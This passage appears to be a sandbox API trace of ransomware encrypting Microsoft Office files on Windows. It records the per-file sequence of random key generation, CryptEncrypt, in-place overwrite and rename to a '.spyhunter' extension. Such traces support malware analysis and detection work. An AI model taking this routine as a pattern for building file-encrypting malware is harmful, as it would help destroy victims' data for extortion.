out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfb5c*=0x581, lpOverlapped=0x0) returned 1 [0099.219] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffa7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.219] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x581, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfb5c*=0x581, lpOverlapped=0x0) returned 1 [0099.220] GetProcessHeap () returned 0x2c0000 [0099.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0099.220] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.220] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb9c*, lpNumberOfBytesWritten=0x25cfb5c*=0x4, lpOverlapped=0x0) returned 1 [0099.220] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb5c*=0x30, lpOverlapped=0x0) returned 1 [0099.220] CloseHandle (hObject=0x170) returned 1 [0099.220] GetProcessHeap () returned 0x2c0000 [0099.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.220] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.spyhunter") returned 90 [0099.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02097_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02097_.gif.spyhunter")) returned 1 [0099.222] GetProcessHeap () returned 0x2c0000 [0099.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.222] GetProcessHeap () returned 0x2c0000 [0099.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0099.222] GetProcessHeap () returned 0x2c0000 [0099.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3527b8 | out: hHeap=0x2c0000) returned 1 [0099.222] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfba0 | out: pbBuffer=0x25cfba0) returned 1 [0099.222] GetProcessHeap () returned 0x2c0000 [0099.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0099.222] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb98*=0x30) returned 1 [0099.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02082_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.224] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF") returned 80 [0099.224] StrStrW (lpFirst="WB02082_.GIF", lpSrch=".txt") returned 0x0 [0099.224] GetProcessHeap () returned 0x2c0000 [0099.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0099.224] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfb5c*=0x996, lpOverlapped=0x0) returned 1 [0099.692] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff66a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.692] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x996, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfb5c*=0x996, lpOverlapped=0x0) returned 1 [0099.693] GetProcessHeap () returned 0x2c0000 [0099.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0099.693] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.693] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb9c*, lpNumberOfBytesWritten=0x25cfb5c*=0x4, lpOverlapped=0x0) returned 1 [0099.693] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb5c*=0x30, lpOverlapped=0x0) returned 1 [0099.693] CloseHandle (hObject=0x154) returned 1 [0099.693] GetProcessHeap () returned 0x2c0000 [0099.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.693] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.spyhunter") returned 90 [0099.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02082_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02082_.gif.spyhunter")) returned 1 [0099.694] GetProcessHeap () returned 0x2c0000 [0099.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.694] GetProcessHeap () returned 0x2c0000 [0099.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0099.694] GetProcessHeap () returned 0x2c0000 [0099.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3525d8 | out: hHeap=0x2c0000) returned 1 [0099.694] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb98 | out: pbBuffer=0x25cfb98) returned 1 [0099.694] GetProcessHeap () returned 0x2c0000 [0099.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0099.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb90*=0x30) returned 1 [0099.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0099.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx") returned 70 [0099.770] StrStrW (lpFirst="Solstice.thmx", lpSrch=".txt") returned 0x0 [0099.770] GetProcessHeap () returned 0x2c0000 [0099.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.770] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfb54*=0x2800, lpOverlapped=0x0) returned 1 [0099.853] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.853] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfb54*=0x2800, lpOverlapped=0x0) returned 1 [0099.853] GetProcessHeap () returned 0x2c0000 [0099.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0099.853] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.853] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x25cfb94*, lpNumberOfBytesWritten=0x25cfb54*=0x4, lpOverlapped=0x0) returned 1 [0099.954] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb54*=0x30, lpOverlapped=0x0) returned 1 [0099.954] CloseHandle (hObject=0x16c) returned 1 [0099.954] GetProcessHeap () returned 0x2c0000 [0099.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.954] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx.spyhunter") returned 80 [0099.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx.spyhunter")) returned 1 [0099.955] GetProcessHeap () returned 0x2c0000 [0099.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.955] GetProcessHeap () returned 0x2c0000 [0099.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0099.955] GetProcessHeap () returned 0x2c0000 [0099.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16a58 | out: hHeap=0x2c0000) returned 1 [0099.955] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb98 | out: pbBuffer=0x25cfb98) returned 1 [0099.955] GetProcessHeap () returned 0x2c0000 [0099.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0099.955] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb90*=0x30) returned 1 [0099.955] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0099.974] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx") returned 73 [0099.974] StrStrW (lpFirst="Perspective.thmx", lpSrch=".txt") returned 0x0 [0099.974] GetProcessHeap () returned 0x2c0000 [0099.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.974] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfb54*=0x2800, lpOverlapped=0x0) returned 1 [0100.217] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.217] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfb54*=0x2800, lpOverlapped=0x0) returned 1 [0100.217] GetProcessHeap () returned 0x2c0000 [0100.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0100.217] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.217] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x25cfb94*, lpNumberOfBytesWritten=0x25cfb54*=0x4, lpOverlapped=0x0) returned 1 [0100.326] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb54*=0x30, lpOverlapped=0x0) returned 1 [0100.326] CloseHandle (hObject=0x16c) returned 1 [0100.326] GetProcessHeap () returned 0x2c0000 [0100.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.326] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx.spyhunter") returned 83 [0100.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx.spyhunter")) returned 1 [0100.376] GetProcessHeap () returned 0x2c0000 [0100.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.376] GetProcessHeap () returned 0x2c0000 [0100.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.376] GetProcessHeap () returned 0x2c0000 [0100.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0100.377] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb90 | out: pbBuffer=0x25cfb90) returned 1 [0100.377] GetProcessHeap () returned 0x2c0000 [0100.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.377] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb88*=0x30) returned 1 [0100.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.377] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml") returned 78 [0100.377] StrStrW (lpFirst="Trek.xml", lpSrch=".txt") returned 0x0 [0100.377] GetProcessHeap () returned 0x2c0000 [0100.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.377] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb4c*=0x3bf, lpOverlapped=0x0) returned 1 [0100.411] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffc41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.411] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb4c*=0x3bf, lpOverlapped=0x0) returned 1 [0100.542] GetProcessHeap () returned 0x2c0000 [0100.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.542] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.542] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb8c*, lpNumberOfBytesWritten=0x25cfb4c*=0x4, lpOverlapped=0x0) returned 1 [0100.542] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb4c*=0x30, lpOverlapped=0x0) returned 1 [0100.542] CloseHandle (hObject=0x16c) returned 1 [0100.605] GetProcessHeap () returned 0x2c0000 [0100.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.607] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.spyhunter") returned 88 [0100.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml.spyhunter")) returned 1 [0100.607] GetProcessHeap () returned 0x2c0000 [0100.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.607] GetProcessHeap () returned 0x2c0000 [0100.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.607] GetProcessHeap () returned 0x2c0000 [0100.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0100.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb90 | out: pbBuffer=0x25cfb90) returned 1 [0100.608] GetProcessHeap () returned 0x2c0000 [0100.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb88*=0x30) returned 1 [0100.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx") returned 67 [0100.624] StrStrW (lpFirst="Verve.thmx", lpSrch=".txt") returned 0x0 [0100.624] GetProcessHeap () returned 0x2c0000 [0100.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0100.624] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb4c*=0x2800, lpOverlapped=0x0) returned 1 [0100.662] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.662] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb4c*=0x2800, lpOverlapped=0x0) returned 1 [0100.662] GetProcessHeap () returned 0x2c0000 [0100.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0100.662] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.662] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb8c*, lpNumberOfBytesWritten=0x25cfb4c*=0x4, lpOverlapped=0x0) returned 1 [0100.677] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb4c*=0x30, lpOverlapped=0x0) returned 1 [0100.677] CloseHandle (hObject=0xf0) returned 1 [0100.677] GetProcessHeap () returned 0x2c0000 [0100.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.677] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx.spyhunter") returned 77 [0100.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\verve.thmx.spyhunter")) returned 1 [0100.678] GetProcessHeap () returned 0x2c0000 [0100.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.678] GetProcessHeap () returned 0x2c0000 [0100.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.678] GetProcessHeap () returned 0x2c0000 [0100.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ef10 | out: hHeap=0x2c0000) returned 1 [0100.678] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb88 | out: pbBuffer=0x25cfb88) returned 1 [0100.678] GetProcessHeap () returned 0x2c0000 [0100.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb80*=0x30) returned 1 [0100.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0335112.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF") returned 65 [0100.679] StrStrW (lpFirst="J0335112.WMF", lpSrch=".txt") returned 0x0 [0100.679] GetProcessHeap () returned 0x2c0000 [0100.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0100.679] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb44*=0x1f64, lpOverlapped=0x0) returned 1 [0100.690] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffe09c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.690] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1f64, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb44*=0x1f64, lpOverlapped=0x0) returned 1 [0100.690] GetProcessHeap () returned 0x2c0000 [0100.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0100.690] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.690] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x25cfb84*, lpNumberOfBytesWritten=0x25cfb44*=0x4, lpOverlapped=0x0) returned 1 [0100.691] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb44*=0x30, lpOverlapped=0x0) returned 1 [0100.691] CloseHandle (hObject=0xf0) returned 1 [0100.691] GetProcessHeap () returned 0x2c0000 [0100.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.691] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF.spyhunter") returned 75 [0100.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 